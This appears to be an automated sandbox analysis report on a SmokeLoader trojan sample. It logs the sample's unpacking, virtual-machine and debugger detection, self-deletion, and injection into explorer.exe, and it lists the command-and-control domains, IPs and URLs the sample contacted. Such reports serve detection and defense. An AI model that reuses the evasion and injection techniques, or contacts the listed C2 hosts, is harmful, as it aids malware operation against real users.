      Source: 00000004.00000002.1849937727.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: RmbF3635xY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: jtruajj.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/2@2/2
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_006804BF CreateToolhelp32Snapshot,Module32First,0_2_006804BF
      Source: C:\Windows\explorer.exeCode function: 2_2_02993678 CoCreateInstance,2_2_02993678
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jtruajjJump to behavior
      Source: RmbF3635xY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\RmbF3635xY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: RmbF3635xY.exeReversingLabs: Detection: 81%
      Source: unknownProcess created: C:\Users\user\Desktop\RmbF3635xY.exe "C:\Users\user\Desktop\RmbF3635xY.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\jtruajj C:\Users\user\AppData\Roaming\jtruajj
      Source: C:\Users\user\Desktop\RmbF3635xY.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\RmbF3635xY.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\RmbF3635xY.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\RmbF3635xY.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\RmbF3635xY.exeUnpacked PE file: 0.2.RmbF3635xY.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\jtruajjUnpacked PE file: 4.2.jtruajj.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_0040237B push 000023C2h; retn 0023h0_2_0040238B
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_004025DC push ebp; ret 0_2_004025FC
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00401284 pushad ; iretd 0_2_00401286
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_005E2643 push ebp; ret 0_2_005E2663
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_005E12EB pushad ; iretd 0_2_005E12ED
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_005E23E2 push 000023C2h; retn 0023h0_2_005E23F2
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_0067D864 pushad ; retf 0067h0_2_0067D865
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00684439 push ebx; ret 0_2_0068443C
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00682D09 push es; retf 0_2_00682D20
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00687A1C push esp; ret 0_2_00687A1D
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_006811E4 pushad ; iretd 0_2_006811E6
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_0040237B push 000023C2h; retn 0023h4_2_0040238B
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_004025DC push ebp; ret 4_2_004025FC
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00401284 pushad ; iretd 4_2_00401286
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_006A2643 push ebp; ret 4_2_006A2663
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_006A12EB pushad ; iretd 4_2_006A12ED
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_006A23E2 push 000023C2h; retn 0023h4_2_006A23F2
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_0084161C pushad ; iretd 4_2_0084161E
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00843141 push es; retf 4_2_00843158
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00847E54 push esp; ret 4_2_00847E55
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00844871 push ebx; ret 4_2_00844874
      Source: RmbF3635xY.exeStatic PE information: section name: .text entropy: 7.486630625699931
      Source: jtruajj.2.drStatic PE information: section name: .text entropy: 7.486630625699931
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jtruajjJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jtruajjJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Deletes itself after installation
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\rmbf3635xy.exeJump to behavior
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\jtruajj:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Checks if the current machine is a virtual machine (disk enumeration)
      Source: C:\Users\user\Desktop\RmbF3635xY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\RmbF3635xY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\RmbF3635xY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\RmbF3635xY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\RmbF3635xY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\RmbF3635xY.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Found evasive API chain (may stop execution after checking system information)
      Source: C:\Users\user\AppData\Roaming\jtruajjEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_4-4067
      Source: C:\Users\user\Desktop\RmbF3635xY.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_0-4120
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\RmbF3635xY.exeAPI/Special instruction interceptor: Address: 7FF90818E814
      Source: C:\Users\user\Desktop\RmbF3635xY.exeAPI/Special instruction interceptor: Address: 7FF90818D584
      Source: C:\Users\user\AppData\Roaming\jtruajjAPI/Special instruction interceptor: Address: 7FF90818E814
      Source: C:\Users\user\AppData\Roaming\jtruajjAPI/Special instruction interceptor: Address: 7FF90818D584
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: jtruajj, 00000004.00000002.1850091879.000000000082E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
      Source: RmbF3635xY.exe, 00000000.00000002.1583122166.000000000066E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKS%XE'
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 417Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 366Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 889Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 861Jump to behavior
      Source: C:\Windows\explorer.exe TID: 1864Thread sleep count: 417 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6940Thread sleep count: 366 > 30Jump to behavior
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h0_2_00418A70
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h4_2_00418A70
      Source: explorer.exe, 00000002.00000000.1573369849.000000000888E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
      Source: explorer.exe, 00000002.00000000.1573369849.0000000008979000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00`
      Source: explorer.exe, 00000002.00000000.1573369849.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
      Source: explorer.exe, 00000002.00000000.1573369849.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008796000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
      Source: explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000002.00000000.1569753972.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
      Source: explorer.exe, 00000002.00000000.1573369849.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
      Source: explorer.exe, 00000002.00000000.1573369849.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000002.00000000.1573369849.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
      Source: explorer.exe, 00000002.00000000.1569753972.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000002.00000000.1573369849.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.1573369849.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
      Source: explorer.exe, 00000002.00000000.1569753972.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\RmbF3635xY.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\RmbF3635xY.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
      Source: C:\Users\user\Desktop\RmbF3635xY.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjSystem information queried: CodeIntegrityInformationJump to behavior
      Found API chain indicative of debugger detection
      Source: C:\Users\user\AppData\Roaming\jtruajjDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_4-4067
      Source: C:\Users\user\Desktop\RmbF3635xY.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-4120
      Source: C:\Users\user\Desktop\RmbF3635xY.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_005E092B mov eax, dword ptr fs:[00000030h]0_2_005E092B
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_005E0D90 mov eax, dword ptr fs:[00000030h]0_2_005E0D90
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_0067FD9C push dword ptr fs:[00000030h]0_2_0067FD9C
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_006A092B mov eax, dword ptr fs:[00000030h]4_2_006A092B
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_006A0D90 mov eax, dword ptr fs:[00000030h]4_2_006A0D90
      Source: C:\Users\user\AppData\Roaming\jtruajjCode function: 4_2_008401D4 push dword ptr fs:[00000030h]4_2_008401D4

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Benign windows process drops PE files
      Source: C:\Windows\explorer.exeFile created: jtruajj.2.drJump to dropped file
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 193.46.217.78 80Jump to behavior
      Creates a thread in another existing process (thread injection)
      Source: C:\Users\user\Desktop\RmbF3635xY.exeThread created: C:\Windows\explorer.exe EIP: 29919F0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjThread created: unknown EIP: 85819F0Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\RmbF3635xY.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\RmbF3635xY.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\jtruajjSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: explorer.exe, 00000002.00000002.2713075850.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1569996493.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000002.00000002.2713075850.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1569996493.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000002.2713075850.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1569996493.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000002.00000002.2713075850.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1569996493.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000002.00000002.2712756787.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1569753972.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanq
      Source: C:\Users\user\Desktop\RmbF3635xY.exeCode function: 0_2_00418A70 InterlockedCompareExchange,GetFocus,ReadConsoleA,FindAtomA,SearchPathA,SetConsoleMode,SearchPathW,GetDefaultCommConfigA,CopyFileExW,CreatePipe,GetEnvironmentStringsW,WriteConsoleOutputA,GetModuleFileNameA,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmW,WaitForSingleObject,SetCommState,GetConsoleAliasesLengthW,GetComputerNameA,CopyFileW,GetFileAttributesA,GetConsoleAliasExesLengthW,GetBinaryType,FormatMessageA,GetLongPathNameA,PurgeComm,LoadLibraryA,MoveFileW,InterlockedCompareExchange,0_2_00418A70
      Source: C:\Windows\explorer.exeCode function: 2_2_02993520 GetUserNameW,2_2_02993520

      Stealing of Sensitive Information

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		32
      Process Injection      		11
      Masquerading      		OS Credential Dumping11
      System Time Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		22
      Virtualization/Sandbox Evasion      		LSASS Memory611
      Security Software Discovery      		Remote Desktop ProtocolData from Removable Media2
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
      Process Injection      		Security Account Manager22
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Hidden Files and Directories      		NTDS3
      Process Discovery      		Distributed Component Object ModelInput Capture113
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA Secrets1
      Application Window Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Software Packing      		Cached Domain Credentials1
      Account Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSync1
      System Owner/User Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      File Deletion      		Proc Filesystem23
      System Information Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525800 Sample: RmbF3635xY.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 21 unicexpertmagazine.pw 2->21 23 ceoconstractionstore.pl 2->23 29 Suricata IDS alerts for network traffic 2->29 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 6 other signatures 2->35 7 RmbF3635xY.exe 2->7         started        10 jtruajj 2->10         started        signatures3 process4 signatures5 37 Detected unpacking (changes PE section rights) 7->37 39 Found evasive API chain (may stop execution after checking system information) 7->39 41 Found API chain indicative of debugger detection 7->41 49 6 other signatures 7->49 12 explorer.exe 36 3 7->12 injected 43 Antivirus detection for dropped file 10->43 45 Multi AV Scanner detection for dropped file 10->45 47 Machine Learning detection for dropped file 10->47 process6 dnsIp7 25 ceoconstractionstore.pl 188.40.141.211, 49711, 80 HETZNER-ASDE Germany 12->25 27 unicexpertmagazine.pw 193.46.217.78, 49710, 49713, 80 CUBENODEES Spain 12->27 17 C:\Users\user\AppData\Roaming\jtruajj, PE32 12->17 dropped 19 C:\Users\user\...\jtruajj:Zone.Identifier, ASCII 12->19 dropped 51 System process connects to network (likely due to code injection or exploit) 12->51 53 Benign windows process drops PE files 12->53 55 Deletes itself after installation 12->55 57 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->57 file8 signatures9

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      RmbF3635xY.exe82%ReversingLabsWin32.Trojan.SmokeLoader
      RmbF3635xY.exe100%AviraHEUR/AGEN.1312567
      RmbF3635xY.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\jtruajj100%AviraHEUR/AGEN.1312567
      C:\Users\user\AppData\Roaming\jtruajj100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\jtruajj82%ReversingLabsWin32.Trojan.SmokeLoader

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://word.office.com0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://outlook.com0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      ceoconstractionstore.pl
      		188.40.141.211
      		truetrue
        		unknown
        unicexpertmagazine.pw
        		193.46.217.78
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://openclehardware.ru/index.phptrue
            		unknown
            http://ceoconstractionstore.pl/index.phptrue
              		unknown
              http://informcoopirationunicolceo.ru/index.phptrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                  		unknown
                  https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-distexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                    		unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://wns.windows.com/batexplorer.exe, 00000002.00000002.2717195196.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2292315664.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.000000000899E000.00000004.00000001.00020000.00000000.sdmpfalse
                      		unknown
                      https://www.stacker.com/arizona/phoenixexplorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                        		unknown
